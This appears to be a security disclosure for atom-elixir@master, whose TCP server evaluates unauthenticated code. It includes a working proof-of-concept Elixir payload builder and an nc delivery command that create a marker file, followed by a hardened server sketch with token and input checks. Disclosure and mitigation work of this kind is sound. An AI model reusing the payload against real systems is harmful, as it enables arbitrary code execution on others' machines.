atom-elixir@master starts a TCP server that listens on all interfaces and evals code without authenticating the user. Anyone on the network can use this to execute arbitrary code with the privileges of the user running atom-elixir. (Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.)
make_payload.exs:
```elixir
# This can, of course, be far worse.
exploit = ~s{File.touch!("/tmp/atom-elixir-rce")}
payload = %{"buffer" => "", "module" => exploit, "function" => "", "line" => ""}
data = %{"request" => "definition", "payload" => payload}
bterm = :erlang.term_to_binary(data)
length = bterm |> byte_size
:ok = IO.write(<<101, length::size(32), bterm::bitstring>>)
```
Make sure atom-elixir@master is running in Atom (`atom --foreground`), take note of the port, and run:

```
elixir make_payload.exs | nc 127.0.0.1 PORT
```

and observe `/tmp/atom-elixir-rce` get created on the target machine (which, as mentioned, does not need to be localhost).
I filed a similar bug on alchemist-server at tonini/alchemist-server#14 and the comments there apply here too, especially: listening only on 127.0.0.1 does not fully resolve the issue because of potential attacks from other users or through the browser.
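
A server-side check covering both points of the report (binding to all interfaces, and evaluating unauthenticated input), as an added example that is not atom-elixir's or alchemist-server's code. The `HardenedFrame` module, the 32-byte token prepended to the report's `<<101, length::32, term>>` framing, and the alias-only rule for `"module"` are assumptions; `:crypto.hash_equals/2` needs OTP 25 or later.

```elixir
# Added sketch: module name, token field and helper names are hypothetical.
defmodule HardenedFrame do
  # Loopback-only listener instead of all interfaces; port 0 lets the OS pick.
  def listen do
    :gen_tcp.listen(0, [:binary, packet: :raw, active: false, ip: {127, 0, 0, 1}])
  end

  # Per-session secret. Assumed to reach the editor plugin over a private
  # channel (for example the child process's stdout), so other local users
  # and browser-originated requests cannot supply it.
  def new_token, do: :crypto.strong_rand_bytes(32)

  # Assumed frame: <<101, length::32, token (32 bytes), term_to_binary(request)>>
  def check(<<101, len::size(32), body::binary-size(len)>>, token) do
    with <<given::binary-size(32), bterm::binary>> <- body,
         true <- :crypto.hash_equals(given, token),
         {:ok, %{"request" => req, "payload" => %{"module" => mod}}} <- decode(bterm),
         true <- is_binary(req) and is_binary(mod) and plain_alias?(mod) do
      {:ok, req, mod}
    else
      _ -> {:error, :rejected}
    end
  end

  def check(_frame, _token), do: {:error, :rejected}

  # Only a plain alias such as "Enum" or "Foo.Bar" passes; nothing is evaluated.
  defp plain_alias?(mod),
    do: Regex.match?(~r/\A[A-Z][A-Za-z0-9_]*(\.[A-Z][A-Za-z0-9_]*)*\z/, mod)

  # :safe refuses terms that would create new atoms or external funs.
  defp decode(bin) do
    {:ok, :erlang.binary_to_term(bin, [:safe])}
  rescue
    ArgumentError -> :error
  end
end

# Constructed sample frames, built the same way as make_payload.exs.
frame = fn token, mod ->
  bterm = :erlang.term_to_binary(%{"request" => "definition", "payload" => %{"module" => mod}})
  body = token <> bterm
  <<101, byte_size(body)::size(32), body::binary>>
end

token = HardenedFrame.new_token()
IO.inspect(HardenedFrame.check(frame.(token, "Enum"), token))                             # accepted
IO.inspect(HardenedFrame.check(frame.(token, ~s{File.touch!("/tmp/x")}), token))          # rejected: not an alias
IO.inspect(HardenedFrame.check(frame.(<<0::256>>, "Enum"), token))                        # rejected: wrong token
```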